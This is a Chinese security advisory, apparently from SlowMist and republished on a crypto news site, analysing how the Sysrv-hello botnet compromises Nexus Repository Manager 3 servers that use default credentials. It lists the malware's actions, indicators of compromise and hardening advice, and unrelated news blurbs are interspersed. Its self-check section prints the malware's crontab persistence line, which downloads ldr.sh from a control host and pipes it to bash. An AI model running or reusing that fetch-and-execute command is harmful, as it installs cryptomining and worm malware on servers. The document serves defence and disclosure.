REPO:慢雾：技术拆解 Sysrv-hello 僵尸网络入侵原理

攻击路径

Sysrv-hello僵尸网络对云上NexusRepositoryManager3存在默认帐号密码的服务器进行攻击，Maven私服部署会用到NexusRepositoryManager3，由于Maven是个流行服务，所以也给了Sysrv-hello僵尸网络的大范围感染机会。

当NexusRepositoryManager3服务对外网开放且存在默认账号密码时，Sysrv-hello就可以直接扫描入侵，利用NexusRepositoryManager3的Tasks功能模块直接运行恶意脚本达到入侵服务器的目的。

慢雾：6月24日至28日Web3生态因安全问题损失近1.5亿美元:7月3日消息，慢雾发推称，自6月24日至6月28日，Web3生态因安全问题遭遇攻击损失149,658,500美元，包括Shido、Ichioka Ventures、Blockchain for dog nose wrinkles、Chibi Finance、Biswap、Themis等。[2023/7/3 22:14:33]

入侵到服务器后会自动下载执行ldr.sh文件，该文件主要功能：1.禁用Linux服务器防火墙(ufw)及清空iptables2.删除aliyun、yunjing等主机安全软件3.禁用apparmor、selinux、watchdog等安全机制4.删除其他竞品5.下载门罗币挖矿程序进行挖矿，文件与进程名为network016.下载第二个木马sysrv进行更高级操作7.在crontab里加上尾巴

慢雾：过去一周Web3生态因安全事件损失约2400万美元:6月19日消息，据慢雾发推称，过去一周Web3生态系统因安全事件损失约2400万美元，包括Atlantis Loans、Ben Armstrong、TrustTheTrident、FPG、Sturdy、Pawnfi、Move VM、Hashflow、DEP/USDT与LEV/USDC、Midas Capital，总计23,795,800美元。[2023/6/19 21:46:18]

第二个木马sysrv的主要功能：1.确保门罗币挖矿程序network01正常运行2.进行蠕虫传播，随机扫描其他IP服务，同样进行NexusRepositoryManager3漏洞利用，同时也会尝试入侵MySQL、Tomcat、WebLogic等服务

声音 | 慢雾：ETC 51%双花攻击所得的所有ETC已归还完毕:据慢雾区消息，ETC 51%攻击后续：继Gate.io宣称攻击者归还了价值10万美金的ETC后，另一家被成功攻击的交易所Yobit近日也宣称收到了攻击者归还的122735 枚 ETC。根据慢雾威胁情报系统的深度关联分析发现：攻击者于UTC时间2019年1月10日11点多完成了攻击所获的所有ETC的归还工作，至此，持续近一周的 ETC 51% 阴云已散。[2019/1/16]

自查方法

进程：network01sysrv

文件：/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab：echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口：52013

存在以上这些，停止备份样本后删除。

加固建议

删除NexusRepositoryManager3Tasks里的恶意代码NexusRepositoryManager3严禁外网访问，严禁默认账号密码NexusRepositoryManager3升级为最新版本被入侵服务器备份重要数据后，重配置或重做检查被入侵服务器是否存在直接访问生产网其他服务的能力，存在则在生产网其他服务所在的服务器上进一步分析是否有异常免责声明：作为区块链信息平台，本站所发布文章仅代表作者个人观点，与链闻ChainNews立场无关。文章内的信息、意见等均仅供参考，并非作为或被视为实际投资建议。

本文来源于非小号媒体平台：

慢雾科技

现已在非小号资讯平台发布68篇作品，

非小号开放平台欢迎币圈作者入驻

入驻指南：

/apply_guide/

本文网址：

/news/9606255.html

免责声明：

1.资讯内容不构成投资建议，投资者应独立决策并自行承担风险

2.本文版权归属原作所有，仅代表作者本人观点，不代表非小号的观点或立场

上一篇：

深入解析MakeDao在新周期里的机遇和风险

标签：RYMAMANPOSIREPOStickManPOSI币REPO币

Gateio热门资讯